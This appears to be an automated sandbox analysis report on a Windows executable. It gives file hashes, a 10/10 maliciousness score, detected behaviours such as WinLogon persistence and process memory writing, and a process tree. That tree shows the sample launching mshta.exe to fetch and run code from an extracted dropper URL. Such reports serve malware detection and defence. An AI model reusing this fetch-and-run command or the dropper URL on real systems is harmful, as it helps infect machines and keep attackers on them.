Overview

overview

10

Static

static

3

712805a785...c1.exe

windows7-x64

712805a785...c1.exe

windows10-2004-x64

Analysis

  • max time kernel
    9s
  • max time network
    14s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    24/01/2024, 02:04

Sharing

Copy URL Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    712805a7852cda5ae9a433c13aab17c1.exe

  • Size

    3.1MB

  • MD5

    712805a7852cda5ae9a433c13aab17c1

  • SHA1

    3010f96ee9e545f01903ab1a117a1c705021ffff

  • SHA256

    7d99b67304773d0c3c52a472c7469333fcfab81bcbfb5013ac5c7b826342e37a

  • SHA512

    910a699fe19a8b2847a52735d41eeca03ce9b118aff0f3fa369006c18553f1991c676ad24ee44fe8a56ebb8ac354aba3f1a080665f2466faff83224655883128

  • SSDEEP

    24576:ruRcKvWLVblQVxgfm0pB6Umenrp6+QzoTvbrTF5NfGWicfi:DkperpEIPTF5NfGW

Score
10/10
persistence

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://rtopotr.com/inst.php?id=02909

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\712805a7852cda5ae9a433c13aab17c1.exe
    "C:\Users\Admin\AppData\Local\Temp\712805a7852cda5ae9a433c13aab17c1.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://rtopotr.com/inst.php?id=02909
      2⤵
      • Modifies Internet Explorer settings
      PID:1740
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\agtyjkj.bat" "
      2⤵
        PID:1788
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x0
      1⤵
        PID:2860
      • C:\Windows\system32\LogonUI.exe
        "LogonUI.exe" /flags:0x1
        1⤵
          PID:2444

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Roaming\agtyjkj.bat
                Filesize

                234B

                MD5

                992c5a8cb96fd6e4e52aebd41ebe5100

                SHA1

                c91d8fd28de2258f491034d47db75269f447c916

                SHA256

                82280aee257e91b20953b8f51a19077999f7ab52c42b558487e661865f6d3f1d

                SHA512

                711f5277f447739b45c4ce0638d125540d986aa34970c7c14f455985d3232d0aa010420aa40b48166e66f5769d3cce5ed78156fc64123e86e3b12ba3aba14344

                Download Submit

              • memory/2288-0-0x0000000000230000-0x0000000000231000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2288-12-0x0000000000400000-0x0000000000726000-memory.dmp

                Filesize

                3.1MB

                Download

              • memory/2444-13-0x00000000026E0000-0x00000000026E1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2860-11-0x0000000002A80000-0x0000000002A81000-memory.dmp

                Filesize

                4KB

                Download